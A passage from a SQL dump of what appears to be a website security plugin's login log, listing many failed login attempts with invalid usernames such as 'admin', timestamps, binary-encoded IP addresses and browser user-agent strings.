Firefox/62.0'),(5252,7919,1629361637.558734,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5253,7920,1629361893.104135,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Dt','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5254,7921,1629361906.274349,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���]�S','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36'),(5255,7922,1629362161.426399,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��X�%1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5256,7923,1629362410.258522,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Ѷ�N','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5257,7923,1629362410.322985,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Ѷ�N','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5258,7925,1629362676.074689,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\"]$d','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36'),(5259,7926,1629362676.478846,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��P��F','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5260,7928,1629363222.962716,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��]qo�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5261,7929,1629363442.793086,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��3�Sq','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(5262,7930,1629363487.828091,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Օg�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5263,7932,1629363756.985878,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g�.�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5264,7933,1629363757.829643,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��X�$�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5265,7934,1629364027.766150,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��˫�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5266,7935,1629364222.038030,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��QX4\Z','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(5267,7936,1629364292.425875,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Ѷ�N','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5268,7937,1629364573.907614,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Wk��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5269,7938,1629364843.214731,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��-wT�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5270,7940,1629365004.034056,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\"C��','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'),(5271,7942,1629365391.741008,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��]qo\"','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5272,7943,1629365665.313128,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����]','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5273,7944,1629365789.531780,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���2��','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(5274,7948,1629366249.836400,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���[J�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5275,7950,1629366591.530479,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���/�\"','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(5276,7952,1629367100.433651,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��QDD�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5277,7955,1629367451.222384,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(5278,7956,1629367680.226186,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5279,7958,1629368000.589257,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\"E�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5280,7960,1629368310.492350,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(5281,7962,1629368550.136526,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��@oxI','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5282,7964,1629369144.492979,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g|_Y','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5283,7965,1629369168.095890,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��-(��','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(5284,7968,1629369719.417588,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���;=�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5285,7969,1629370012.060032,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���wң','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(5286,7970,1629370013.752341,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��ϔK','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5287,7971,1629370291.849655,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��3� ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5288,7973,1629370611.148731,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����B�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5289,7976,1629372640.601346,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���|� ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5290,7984,1629379312.933615,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5291,7987,1629381661.154261,1,'loginFailInvalidUsername','dogstardesign',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36'),(5292,7987,1629381661.190747,1,'loginFailInvalidUsername','dogstardesign',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36'),(5293,7989,1629383710.716429,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��-w�B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5294,7997,1629390463.725943,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��)�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5295,8004,1629394871.548506,1,'loginFailInvalidUsername','co',0,'\0\0\0\0\0\0\0\0\0\0��e \Z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5296,8010,1629399233.153947,1,'loginFailInvalidUsername','co',0,'\0\0\0\0\0\0\0\0\0\0��gnV~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5297,8011,1629400008.183018,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36'),(5298,8013,1629401431.533601,1,'loginFailInvalidUsername','co',0,'\0\0\0\0\0\0\0\0\0\0��g\'7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5299,8015,1629403572.066873,1,'loginFailInvalidUsername','co',0,'\0\0\0\0\0\0\0\0\0\0���zX�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5300,8017,1629404848.055155,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��3S�\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5301,8018,1629405255.595519,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���}z/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5302,8019,1629405685.927274,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��-Ln�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5303,8020,1629405713.777710,1,'loginFailInvalidUsername','Admin',0,'\0\0\0\0\0\0\0\0\0\0���;S�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5304,8021,1629405825.266122,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36'),(5305,8023,1629406678.035788,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5306,8024,1629407191.704552,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36'),(5307,8025,1629407199.446596,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g�ʖ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5308,8026,1629407755.643702,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��h�\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5309,8027,1629407833.815900,1,'loginFailInvalidUsername','Admin',0,'\0\0\0\0\0\0\0\0\0\0���U��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5310,8028,1629408337.886062,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��C�=�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5311,8029,1629408538.510251,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36'),(5312,8030,1629408929.795653,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����-�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5313,8032,1629409525.227565,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5314,8035,1629410116.719514,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����e�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5315,8036,1629410701.911010,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��t�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5316,8037,1629411208.061213,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36'),(5317,8038,1629411364.838956,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��gk�s','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5318,8038,1629411364.852263,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��gk�s','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5319,8042,1629412635.895473,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���cN�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5320,8044,1629413844.182025,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36'),(5321,8045,1629413944.874045,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��E��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5322,8046,1629414584.284577,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��`}��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5323,8046,1629414584.322133,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��`}��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5324,8047,1629415284.324912,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��@��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5325,8051,1629416697.599788,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36'),(5326,8053,1629417698.928580,1,'loginFailInvalidUsername','Admin',0,'\0\0\0\0\0\0\0\0\0\0����9d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5327,8056,1629419397.750791,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5328,8057,1629419678.253241,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36'),(5329,8058,1629419707.336537,1,'loginFailInvalidUsername','Admin',0,'\0\0\0\0\0\0\0\0\0\0��ν��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5330,8059,1629420116.887850,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��)�@K','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5331,8061,1629421116.804675,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36'),(5332,8063,1629422336.282165,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��}��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5333,8064,1629422373.861971,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),(5334,8065,1629422665.113295,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��R@�x','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5335,8066,1629423075.897903,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5336,8068,1629424268.048657,1,'loginFailInvalidUsername','dogstardesign',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36'),(5337,8071,1629425347.889691,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@t�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5338,8072,1629425978.098578,1,'loginFailInvalidUsername','dogstardesign',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36'),(5339,8073,1629426907.201587,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��2tb','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5340,8075,1629427710.919658,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��gk�s','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5341,8076,1629428488.621944,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����L`','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5342,8077,1629428670.504068,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36'),(5343,8081,1629430110.136599,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���l��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5344,8082,1629430911.274621,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Ů�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5345,8085,1629431699.358100,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��/[+�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5346,8086,1629432526.399389,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��E��|','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5347,8087,1629432598.690326,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36'),(5348,8089,1629433829.867377,1,'loginFailInvalidUsername','dogstardesign',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36'),(5349,8090,1629434006.402152,1,'loginFailInvalidUsername','Admin',0,'\0\0\0\0\0\0\0\0\0\0��Z��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5350,8091,1629434167.811893,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����O','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5351,8092,1629435021.156510,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5352,8093,1629435251.190009,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36'),(5353,8094,1629435678.502706,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Dc�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5354,8095,1629436160.800777,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���q�t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5355,8096,1629436270.631075,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g\'7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5356,8097,1629436552.129948,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36'),(5357,8098,1629436554.363571,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��]��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5358,8099,1629436951.089436,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��U�,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5359,8100,1629437320.430374,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��gt�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5360,8101,1629437707.910254,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���a��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5361,8102,1629437823.870050,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36'),(5362,8103,1629438080.724152,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��)�@K','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5363,8104,1629438841.468410,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\rL��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5364,8105,1629439123.562861,1,'loginFailInvalidUsername','dogstardesign',0,'\0\0\0\0\0\0\0\0\0\0���>L','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36'),(5365,8106,1629439199.980690,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��ár�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5366,8107,1629439594.995174,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���.x�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5367,8108,1629439944.973037,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��+�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5368,8109,1629440340.358710,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5369,8111,1629440721.413942,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����%+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5370,8112,1629440974.811525,1,'loginFailInvalidUsername','Admin',0,'\0\0\0\0\0\0\0\0\0\0���:�3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5371,8112,1629440974.904588,1,'loginFailInvalidUsername','Admin',0,'\0\0\0\0\0\0\0\0\0\0���:�3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5372,8113,1629441467.452649,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5373,8115,1629442650.303368,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����q','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5374,8117,1629443014.894936,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��3�8�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5375,8118,1629443370.326255,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���R-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5376,8119,1629443746.254928,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) 